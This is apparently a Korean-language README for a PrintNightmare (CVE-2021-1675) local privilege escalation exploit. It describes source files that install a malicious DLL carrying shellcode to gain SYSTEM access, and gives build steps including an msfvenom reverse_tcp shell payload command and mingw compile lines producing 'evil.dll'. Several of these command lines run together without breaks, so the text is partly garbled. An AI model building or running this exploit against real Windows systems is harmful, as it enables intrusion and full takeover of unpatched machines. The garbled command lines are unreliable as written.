
로컬 권한 상승 익스플로잇으로, CVE-2021-1675(PrintNightmare)를 악용하여 취약한 Windows 시스템에서 악성 DLL을 설치하고 SYSTEM 액세스 권한을 획득합니다.
src/nightmare.cpp: CVE-2021-1675를 악용하여 시스템 액세스 권한을 얻는 소스 코드 악성 dll을 설치하여 src/payload-dll.cpp: 엔트리 함수에 악성 셸코드가 포함된 dll용 소스 코드
!!테스트 권한이 있는 서버에만 사용하세요
CVE-2021-1675는 Microsoft Windows의 Print Spooler 서비스에서 발견된 취약점으로, 공격자가 SeLoadDriverPrivilege 검사를 우회할 수 있게 합니다. 이 취약점은 셸코드를 호출하거나 Windows API를 사용하여 리버스 셸 연결을 설정하는 악성 DLL을 설치함으로써 대상 머신에서 권한 상승을 달성하는 데 활용될 수 있습니다. 2021년 6월 8일 이전의 Windows 10/8/Server 2008/Server 2012 버전이 영향을 받습니다.
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/